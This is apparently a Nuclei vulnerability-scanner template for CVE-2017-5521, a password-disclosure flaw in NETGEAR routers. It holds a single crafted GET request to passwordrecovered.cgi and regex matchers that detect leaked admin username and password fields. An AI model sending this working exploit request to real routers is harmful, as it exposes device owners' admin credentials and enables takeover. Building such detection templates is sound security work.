id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: high
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server.
  reference:
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  tags: cve,cve2017,auth-bypass
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.10
    cve-id: CVE-2017-5521
    cwe-id: CWE-200

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    # Report a finding only when the body patterns and the status code both match.
    matchers-condition: and
    matchers:
      # Regex matcher: the patterns contain \s*, which a word matcher would
      # compare as literal text and therefore never find in the response.
      - type: regex
        regex:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body

      - type: status
        status:
          - 200